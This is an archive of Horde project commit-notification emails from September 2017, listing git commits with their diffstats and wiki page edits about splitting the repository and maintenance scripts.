 mnemo/lib/Application.php                         |  5 +++
 mnemo/package.xml                                 |  2 +-
 nag/lib/Application.php                           |  5 +++
 nag/package.xml                                   |  2 +-
 turba/lib/Application.php                         |  5 +++
 turba/package.xml                                 |  2 +-
 15 files changed, 146 insertions(+), 22 deletions(-)

http://github.com/horde/horde/commit/47261d972e5b984e24e562ba1f58b53d20198120



From wikiguest at horde.org  Sat Sep 23 23:54:36 2017
From: wikiguest at horde.org (Wiki Guest)
Date: Sat, 23 Sep 2017 23:54:36 +0000
Subject: [commits] [Wiki] created: FAQ/admin/config/index.php
Message-ID: <20170923235436.Horde.l2JBWKDlnjMaTl4-HP64a0u@wiki.horde.org>

guest [87.138.217.73]  Sat, 23 Sep 2017 23:54:36 +0000

Created page: https://wiki.horde.org/FAQ/admin/config/index.php

[[toc]]

+ Project Name

Project summary and goal. Please include what the scope of the project  
is, what applications or libraries it touches, and what it is intended  
to accomplish at a minimum.

++ Bugs

List any tickets on http://bugs.horde.org/ that cover this issue or  
are relevant to it.

++ People

Who is or might be involved in this project? Who can answer questions  
about it, either about a specific technology (iCalendar) or about a  
specific part of Horde (Kronolith)?

++ Description

Detailed project description. Include implementation steps, current  
status, plan, etc.

++ Resources

Include links to protocol descriptions, specifications, RFCs, external  
applications, presentations on http://horde.org/papers/ or elsewhere  
that are relevant, articles, API docs from http://dev.horde.org/ -  
anything that might be useful to someone working on this.


----
Back to the ((Project|Project List))


From jan at horde.org  Mon Sep 25 09:22:12 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 09:22:12 +0000
Subject: [commits] [Wiki] deleted: FAQ/admin/config/index.php
Message-ID: <20170925092212.Horde.xivN-6DLbrYpQ6M8wMWk5bu@wiki.horde.org>

jan  Mon, 25 Sep 2017 09:22:12 +0000

Deleted page: FAQ/admin/config/index.php


From jan at horde.org  Mon Sep 25 12:40:20 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 12:40:20 +0000
Subject: [commits] [Wiki] changed: Project/SplitGitRepo
Message-ID: <20170925124020.Horde.76s2-JPtmWun0BIB0m8ABjd@wiki.horde.org>

jan  Mon, 25 Sep 2017 12:40:20 +0000

Modified page: https://wiki.horde.org/Project/SplitGitRepo
New Revision:  26
Change log:  List the scripts

@@ -45,9 +45,23 @@
   * **X** This script can create/clone the git repos as needed.
   * **X** All repos will be stored in a base folder
   * **X** Option to create a separate, web-accessible directory.
   * **O** Includes stuff in framework/bin
+  * **O** horde-generate-module
+  * **X** horde-rev-cmp (obsolete)
+  * **O** horde-run-cmd
+  * **X** install_dev
+  * **O** install_framework (obsolete?)
+  * **O** pear_batch_install
+  * **O** test_framework
   * **O** Includes stuff in horde-support/maintenance-tools
+  * **O** horde-build-snaps
+  * **O** horde-build-website-docs.sh
+  * **O** horde-ckeditor
+  * **O** horde-installer-phar-create
+  * **O** horde-js-compress
+  * **O** horde-patch-config.sh
+  * **O** horde-update-ISO3166-countries
   * **O** Includes the groupware install code (in fact, the  
Horde_Core_Bundle code is probably a good place to start in terms of  
creating the install script).
   * **O** Use Horde_Pear libs to query for list of packages to install
   * **O** This script can be packaged via PHAR
    * **O** Allow config file


From jan at horde.org  Mon Sep 25 12:43:14 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 12:43:14 +0000
Subject: [commits] [Wiki] changed: Project/SplitGitRepo
Message-ID: <20170925124314.Horde.pDmzNJTLVCUKExeoIthtLoB@wiki.horde.org>

jan  Mon, 25 Sep 2017 12:43:14 +0000

Modified page: https://wiki.horde.org/Project/SplitGitRepo
New Revision:  27
Change log:  More updates to scripts

@@ -44,23 +44,23 @@
  # **O** Create single installation script
   * **X** This script can create/clone the git repos as needed.
   * **X** All repos will be stored in a base folder
   * **X** Option to create a separate, web-accessible directory.
- * **O** Includes stuff in framework/bin
+ * **O** Includes stuff in framework/bin (See ((Doc/Dev/Scripts)))
    * **O** horde-generate-module
    * **X** horde-rev-cmp (obsolete)
    * **O** horde-run-cmd
    * **X** install_dev
    * **O** install_framework (obsolete?)
    * **O** pear_batch_install
    * **O** test_framework
- * **O** Includes stuff in horde-support/maintenance-tools
-  * **O** horde-build-snaps
+ * **O** Includes stuff in horde-support/maintenance-tools (See  
((Doc/Dev/Scripts)))
+  * **X** horde-build-snaps (obsolete)
    * **O** horde-build-website-docs.sh
    * **O** horde-ckeditor
    * **O** horde-installer-phar-create
-  * **O** horde-js-compress
-  * **O** horde-patch-config.sh
+  * **X** horde-js-compress (obsolete)
+  * **X** horde-patch-config.sh (obsolete)
    * **O** horde-update-ISO3166-countries
   * **O** Includes the groupware install code (in fact, the  
Horde_Core_Bundle code is probably a good place to start in terms of  
creating the install script).
   * **O** Use Horde_Pear libs to query for list of packages to install
   * **O** This script can be packaged via PHAR


From jan at horde.org  Mon Sep 25 13:55:15 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 15:55:15 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	df1a143abe0d406fb34201fde79f2f484da6b849
Message-ID: <20170925135515.CB24F100BCC@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 47261d972e5b984e24e562ba1f58b53d20198120

df1a143 Remove user data from all apps; improve messages.

Summary: http://github.com/horde/horde/compare/47261d972e5b984e24e562ba1f58b53d20198120...df1a143abe0d406fb34201fde79f2f484da6b849

-----------------------------------------------------------------------

commit df1a143abe0d406fb34201fde79f2f484da6b849
Author: Jan Schneider 
Date:   Mon Sep 25 15:55:04 2017 +0200

    Remove user data from all apps; improve messages.

 horde/lib/Cli/Backup.php | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

http://github.com/horde/horde/commit/df1a143abe0d406fb34201fde79f2f484da6b849



From jan at horde.org  Mon Sep 25 15:01:32 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 17:01:32 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	f8f0f21a619702e938d8880510b157bc170cf984
Message-ID: <20170925150132.CBF1C100C84@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: df1a143abe0d406fb34201fde79f2f484da6b849

067298f fix pgp key lookup if more than one key is found
ef12878 Add fixme.
9e782aa Add warning.
f8f0f21 Merge branch 'fix-key-array' of https://github.com/duritong/horde

Summary: http://github.com/horde/horde/compare/df1a143abe0d406fb34201fde79f2f484da6b849...f8f0f21a619702e938d8880510b157bc170cf984

-----------------------------------------------------------------------

commit 067298f31b6efdd10050c68add25b19a9ac59bb3
Author: mh 
Date:   Fri Sep 22 14:19:46 2017 +0200

    fix pgp key lookup if more than one key is found
    
    reset() *returns* the first element, so let's actually do what the
    comment above says.

 imp/lib/Pgp.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/067298f31b6efdd10050c68add25b19a9ac59bb3

-----------------------------------------------------------------------

commit ef12878f78076d7b98dc3fa052ce9d389d750bb6
Author: Jan Schneider 
Date:   Mon Sep 25 17:00:34 2017 +0200

    Add fixme.

 framework/Icalendar/lib/Horde/Icalendar.php | 2 ++
 1 file changed, 2 insertions(+)

http://github.com/horde/horde/commit/ef12878f78076d7b98dc3fa052ce9d389d750bb6

-----------------------------------------------------------------------

commit 9e782aa94319c83c533cb1b4e4a3efa67b918f8d
Author: Jan Schneider 
Date:   Mon Sep 25 17:00:48 2017 +0200

    Add warning.

 framework/Core/lib/Horde/Registry/Application.php | 3 +++
 1 file changed, 3 insertions(+)

http://github.com/horde/horde/commit/9e782aa94319c83c533cb1b4e4a3efa67b918f8d

-----------------------------------------------------------------------

commit f8f0f21a619702e938d8880510b157bc170cf984
Merge: 9e782aa 067298f
Author: Jan Schneider 
Date:   Mon Sep 25 17:00:57 2017 +0200

    Merge branch 'fix-key-array' of https://github.com/duritong/horde

 imp/lib/Pgp.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/f8f0f21a619702e938d8880510b157bc170cf984



From jan at horde.org  Mon Sep 25 15:16:53 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 17:16:53 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	9903876063334f33203c0f842099829c6956a777
Message-ID: <20170925151656.8641C100C84@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 8c7b51266bf176b0435d5737f36ae345fcefcb5a

931a3b4 [jan] Fix generating PDF thumbnails with imagick extension 3.3.0+ (arjen+horde at de-korte.org, Bug #14697).
9903876 [jan] Fix retrieving one of multiple public PGP keys (mh ).

Summary: http://github.com/horde/horde/compare/8c7b51266bf176b0435d5737f36ae345fcefcb5a...9903876063334f33203c0f842099829c6956a777

-----------------------------------------------------------------------

commit 931a3b44233ce25714b5694ac6ee6c1f56988cfc
Author: Jan Schneider 
Date:   Mon Sep 25 17:09:45 2017 +0200

    [jan] Fix generating PDF thumbnails with imagick extension 3.3.0+ (arjen+horde at de-korte.org, Bug #14697).

 imp/docs/CHANGES            | 2 ++
 imp/lib/Mime/Viewer/Pdf.php | 3 ++-
 imp/package.xml             | 4 ++--
 3 files changed, 6 insertions(+), 3 deletions(-)

http://github.com/horde/horde/commit/931a3b44233ce25714b5694ac6ee6c1f56988cfc

-----------------------------------------------------------------------

commit 9903876063334f33203c0f842099829c6956a777
Author: Jan Schneider 
Date:   Mon Sep 25 17:16:37 2017 +0200

    [jan] Fix retrieving one of multiple public PGP keys (mh ).

 imp/docs/CHANGES      | 1 +
 imp/lib/Crypt/Pgp.php | 2 +-
 imp/package.xml       | 2 ++
 3 files changed, 4 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/9903876063334f33203c0f842099829c6956a777



From jan at horde.org  Mon Sep 25 15:23:35 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 17:23:35 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	d70680d9dfeacc30398a84db7406aa4fa9c2d697
Message-ID: <20170925152339.D85A8100D56@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: f8f0f21a619702e938d8880510b157bc170cf984

c50c320 [jan] Fix generating PDF thumbnails with imagick extension 3.3.0+ (arjen+horde at de-korte.org, Bug #14697).
d70680d BFN

Summary: http://github.com/horde/horde/compare/f8f0f21a619702e938d8880510b157bc170cf984...d70680d9dfeacc30398a84db7406aa4fa9c2d697

-----------------------------------------------------------------------

commit c50c32000228639f7fa31ba2376542f73ecfeb1e
Author: Jan Schneider 
Date:   Mon Sep 25 17:09:45 2017 +0200

    [jan] Fix generating PDF thumbnails with imagick extension 3.3.0+ (arjen+horde at de-korte.org, Bug #14697).

 imp/lib/Mime/Viewer/Pdf.php |  3 ++-
 imp/package.xml             | 15 ++++++++++++++-
 2 files changed, 16 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/c50c32000228639f7fa31ba2376542f73ecfeb1e

-----------------------------------------------------------------------

commit d70680d9dfeacc30398a84db7406aa4fa9c2d697
Author: Jan Schneider 
Date:   Mon Sep 25 17:23:22 2017 +0200

    BFN

 imp/package.xml | 1 +
 1 file changed, 1 insertion(+)

http://github.com/horde/horde/commit/d70680d9dfeacc30398a84db7406aa4fa9c2d697



From jan at horde.org  Mon Sep 25 15:24:56 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 17:24:56 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	a4426c8b7c94a6cd954758e299d799f3af47bc4a
Message-ID: <20170925152456.B7829100DE8@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: d70680d9dfeacc30398a84db7406aa4fa9c2d697

a4426c8 Use is_dir() to check for directories

Summary: http://github.com/horde/horde/compare/d70680d9dfeacc30398a84db7406aa4fa9c2d697...a4426c8b7c94a6cd954758e299d799f3af47bc4a

-----------------------------------------------------------------------

commit a4426c8b7c94a6cd954758e299d799f3af47bc4a
Author: Thomas Jarosch 
Date:   Thu Sep 14 15:56:51 2017 +0200

    Use is_dir() to check for directories
    
    Request: 14689
    Signed-off-by: Jan Schneider 

 framework/Translation/lib/Horde/Translation/Autodetect.php | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

http://github.com/horde/horde/commit/a4426c8b7c94a6cd954758e299d799f3af47bc4a



From jan at horde.org  Mon Sep 25 15:43:31 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 17:43:31 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	eb418104c9192dbccffe88c37b0ee76ab114b120
Message-ID: <20170925154334.78BF3100C84@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: a4426c8b7c94a6cd954758e299d799f3af47bc4a

650f33e Improve check for horde_lz4/lzf (Request #14693).
54fc56f Fix MySQL test.
0cda7a1 Some distros do GC in a different way.
eb41810 Fix comment.

Summary: http://github.com/horde/horde/compare/a4426c8b7c94a6cd954758e299d799f3af47bc4a...eb418104c9192dbccffe88c37b0ee76ab114b120

-----------------------------------------------------------------------

commit 650f33e7e4259b3a35db7a3b2bad0970f8961a3d
Author: Jan Schneider 
Date:   Mon Sep 25 17:36:41 2017 +0200

    Improve check for horde_lz4/lzf (Request #14693).

 horde/lib/Test.php | 27 +++++++++++++++++----------
 1 file changed, 17 insertions(+), 10 deletions(-)

http://github.com/horde/horde/commit/650f33e7e4259b3a35db7a3b2bad0970f8961a3d

-----------------------------------------------------------------------

commit 54fc56f029d8ddfe6d345ad310362d47d0ea8224
Author: Jan Schneider 
Date:   Mon Sep 25 17:39:40 2017 +0200

    Fix MySQL test.

 horde/lib/Test.php | 10 +++++++++-
 1 file changed, 9 insertions(+), 1 deletion(-)

http://github.com/horde/horde/commit/54fc56f029d8ddfe6d345ad310362d47d0ea8224

-----------------------------------------------------------------------

commit 0cda7a1ae8bd6a52e247eceffb932a35650bbc2e
Author: Jan Schneider 
Date:   Mon Sep 25 17:42:20 2017 +0200

    Some distros do GC in a different way.

 horde/lib/Test.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/0cda7a1ae8bd6a52e247eceffb932a35650bbc2e

-----------------------------------------------------------------------

commit eb418104c9192dbccffe88c37b0ee76ab114b120
Author: Jan Schneider 
Date:   Mon Sep 25 17:42:39 2017 +0200

    Fix comment.

 horde/lib/Test.php | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

http://github.com/horde/horde/commit/eb418104c9192dbccffe88c37b0ee76ab114b120



From jan at horde.org  Mon Sep 25 15:51:11 2017
From: jan at horde.org (Jan Schneider)
Date: Mon, 25 Sep 2017 17:51:11 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	45e962525d5c178ed60aec7460005729cbd2c31c
Message-ID: <20170925155113.558F9100C84@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: eb418104c9192dbccffe88c37b0ee76ab114b120

45e9625 Test for Predis library (Request #14692).

Summary: http://github.com/horde/horde/compare/eb418104c9192dbccffe88c37b0ee76ab114b120...45e962525d5c178ed60aec7460005729cbd2c31c

-----------------------------------------------------------------------

commit 45e962525d5c178ed60aec7460005729cbd2c31c
Author: Jan Schneider 
Date:   Mon Sep 25 17:50:57 2017 +0200

    Test for Predis library (Request #14692).

 horde/lib/Test.php | 3 +++
 1 file changed, 3 insertions(+)

http://github.com/horde/horde/commit/45e962525d5c178ed60aec7460005729cbd2c31c



From jan at horde.org  Mon Sep 25 23:15:06 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 26 Sep 2017 01:15:06 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	df6d5d5b6236aaf9de73ca55875d22ce57bbb1c9
Message-ID: <20170925231506.5FF61100D56@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 388f2df77bac8565fbb0a7f6a1ea44f8459dd753

df6d5d5 Crontab: update documentation files.

Summary: http://github.com/horde/horde-web/compare/388f2df77bac8565fbb0a7f6a1ea44f8459dd753...df6d5d5b6236aaf9de73ca55875d22ce57bbb1c9

-----------------------------------------------------------------------

commit df6d5d5b6236aaf9de73ca55875d22ce57bbb1c9
Author: Jan Schneider 
Date:   Tue Sep 26 01:14:59 2017 +0200

    Crontab: update documentation files.

 app/views/App/apps/imp/docs/CHANGES.html | 3 +++
 1 file changed, 3 insertions(+)

http://github.com/horde/horde-web/commit/df6d5d5b6236aaf9de73ca55875d22ce57bbb1c9



From jan at horde.org  Tue Sep 26 13:36:10 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 26 Sep 2017 15:36:10 +0200 (CEST)
Subject: [commits] Horde branch FRAMEWORK_5_2 updated.
	e740a718580ca392ae7d3a28da09e6b7e3219c75
Message-ID: <20170926133614.93B38100E05@spencer.horde.org>

The branch "FRAMEWORK_5_2" has been updated.
The following is a summary of the commits.

from: 9903876063334f33203c0f842099829c6956a777

b8aa3e9 Merge test improvements from master.
7aca73f [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14698).
d97ca15 [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14699).
e740a71 [jan] Fix notice when re-exporting tasks without priority (Bug #14699).

Summary: http://github.com/horde/horde/compare/9903876063334f33203c0f842099829c6956a777...e740a718580ca392ae7d3a28da09e6b7e3219c75

-----------------------------------------------------------------------

commit b8aa3e954c0311047c47acb6c3f89e45c481efb2
Author: Jan Schneider 
Date:   Mon Sep 25 17:55:35 2017 +0200

    Merge test improvements from master.

 horde/lib/Test.php | 44 +++++++++++++++++++++++++++++++-------------
 1 file changed, 31 insertions(+), 13 deletions(-)

http://github.com/horde/horde/commit/b8aa3e954c0311047c47acb6c3f89e45c481efb2

-----------------------------------------------------------------------

commit 7aca73feb979ef477077335ac283defaa761b6a2
Author: Jan Schneider 
Date:   Tue Sep 26 15:20:29 2017 +0200

    [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14698).

 kronolith/docs/CHANGES  | 2 ++
 kronolith/lib/Event.php | 6 +-----
 kronolith/package.xml   | 4 ++--
 3 files changed, 5 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/7aca73feb979ef477077335ac283defaa761b6a2

-----------------------------------------------------------------------

commit d97ca159549f2ab4342ce5f4b9cdaac1c6bfebb2
Author: Jan Schneider 
Date:   Tue Sep 26 15:35:18 2017 +0200

    [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14699).

 nag/docs/CHANGES | 2 ++
 nag/lib/Task.php | 6 +-----
 nag/package.xml  | 4 ++--
 3 files changed, 5 insertions(+), 7 deletions(-)

http://github.com/horde/horde/commit/d97ca159549f2ab4342ce5f4b9cdaac1c6bfebb2

-----------------------------------------------------------------------

commit e740a718580ca392ae7d3a28da09e6b7e3219c75
Author: Jan Schneider 
Date:   Tue Sep 26 15:35:54 2017 +0200

    [jan] Fix notice when re-exporting tasks without priority (Bug #14699).

 nag/docs/CHANGES | 1 +
 nag/lib/Task.php | 1 +
 nag/package.xml  | 2 ++
 3 files changed, 4 insertions(+)

http://github.com/horde/horde/commit/e740a718580ca392ae7d3a28da09e6b7e3219c75



From jan at horde.org  Tue Sep 26 13:53:11 2017
From: jan at horde.org (Jan Schneider)
Date: Tue, 26 Sep 2017 15:53:11 +0200 (CEST)
Subject: [commits] Horde branch master updated.
	0f3486d073f69c4036ead2fb22a7ba744cac3ad8
Message-ID: <20170926135316.5F2A8100E19@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 45e962525d5c178ed60aec7460005729cbd2c31c

10254cc [jan] Improve S/MIME key details formatting.
af7efdb [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14698).
be530a4 [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14699).
0f3486d [jan] Fix notice when re-exporting tasks without priority (Bug #14699).

Summary: http://github.com/horde/horde/compare/45e962525d5c178ed60aec7460005729cbd2c31c...0f3486d073f69c4036ead2fb22a7ba744cac3ad8

-----------------------------------------------------------------------

commit 10254ccfa511246717aba13d9260702c302a1d05
Author: Jan Schneider 
Date:   Tue Sep 26 15:12:45 2017 +0200

    [jan] Improve S/MIME key details formatting.

 framework/Crypt/lib/Horde/Crypt/Smime.php | 100 ++++++++++++++++++++----------
 framework/Crypt/package.xml               |   4 +-
 2 files changed, 70 insertions(+), 34 deletions(-)

http://github.com/horde/horde/commit/10254ccfa511246717aba13d9260702c302a1d05

-----------------------------------------------------------------------

commit af7efdb22eb6c59fff243eb6626322901cd912a4
Author: Jan Schneider 
Date:   Tue Sep 26 15:20:29 2017 +0200

    [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14698).

 kronolith/docs/CHANGES  | 11 +++++++++++
 kronolith/lib/Event.php |  6 +-----
 kronolith/package.xml   | 15 ++++++++++++++-
 3 files changed, 26 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/af7efdb22eb6c59fff243eb6626322901cd912a4

-----------------------------------------------------------------------

commit be530a444770eab6010ccac622472948c6504500
Author: Jan Schneider 
Date:   Tue Sep 26 15:35:18 2017 +0200

    [jan] Fix regression in exporting single tags to iCalendar CATEGORIES (Bug #14699).

 nag/lib/Task.php |  6 +-----
 nag/package.xml  | 16 +++++++++++++++-
 2 files changed, 16 insertions(+), 6 deletions(-)

http://github.com/horde/horde/commit/be530a444770eab6010ccac622472948c6504500

-----------------------------------------------------------------------

commit 0f3486d073f69c4036ead2fb22a7ba744cac3ad8
Author: Jan Schneider 
Date:   Tue Sep 26 15:35:54 2017 +0200

    [jan] Fix notice when re-exporting tasks without priority (Bug #14699).

 nag/docs/CHANGES | 9 +++++++++
 nag/lib/Task.php | 1 +
 2 files changed, 10 insertions(+)

http://github.com/horde/horde/commit/0f3486d073f69c4036ead2fb22a7ba744cac3ad8



From jan at horde.org  Tue Sep 26 23:15:25 2017
From: jan at horde.org (Jan Schneider)
Date: Wed, 27 Sep 2017 01:15:25 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	24abda10872999a02623e13449fd7d9c179959e3
Message-ID: <20170926231525.BAAE2100B6A@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: df6d5d5b6236aaf9de73ca55875d22ce57bbb1c9

24abda1 Crontab: update documentation files.

Summary: http://github.com/horde/horde-web/compare/df6d5d5b6236aaf9de73ca55875d22ce57bbb1c9...24abda10872999a02623e13449fd7d9c179959e3

-----------------------------------------------------------------------

commit 24abda10872999a02623e13449fd7d9c179959e3
Author: Jan Schneider 
Date:   Wed Sep 27 01:15:20 2017 +0200

    Crontab: update documentation files.

 app/views/App/apps/kronolith/docs/CHANGES.html | 2 ++
 app/views/App/apps/nag/docs/CHANGES.html       | 3 +++
 2 files changed, 5 insertions(+)

http://github.com/horde/horde-web/commit/24abda10872999a02623e13449fd7d9c179959e3



From jan at horde.org  Wed Sep 27 09:12:10 2017
From: jan at horde.org (Jan Schneider)
Date: Wed, 27 Sep 2017 11:12:10 +0200 (CEST)
Subject: [commits] Horde Web Source branch master updated.
	86b3cf87df6381621199a1307b01677b07b47e6a
Message-ID: <20170927091210.3B936100AA5@spencer.horde.org>

The branch "master" has been updated.
The following is a summary of the commits.

from: 24abda10872999a02623e13449fd7d9c179959e3

86b3cf8 Gmane is dead.

Summary: http://github.com/horde/horde-web/compare/24abda10872999a02623e13449fd7d9c179959e3...86b3cf87df6381621199a1307b01677b07b47e6a

-----------------------------------------------------------------------

commit 86b3cf87df6381621199a1307b01677b07b47e6a
Author: Jan Schneider 
Date:   Wed Sep 27 11:12:00 2017 +0200

    Gmane is dead.

 app/views/Community/mail.html.php | 6 +-----
 1 file changed, 1 insertion(+), 5 deletions(-)

http://github.com/horde/horde-web/commit/86b3cf87df6381621199a1307b01677b07b47e6a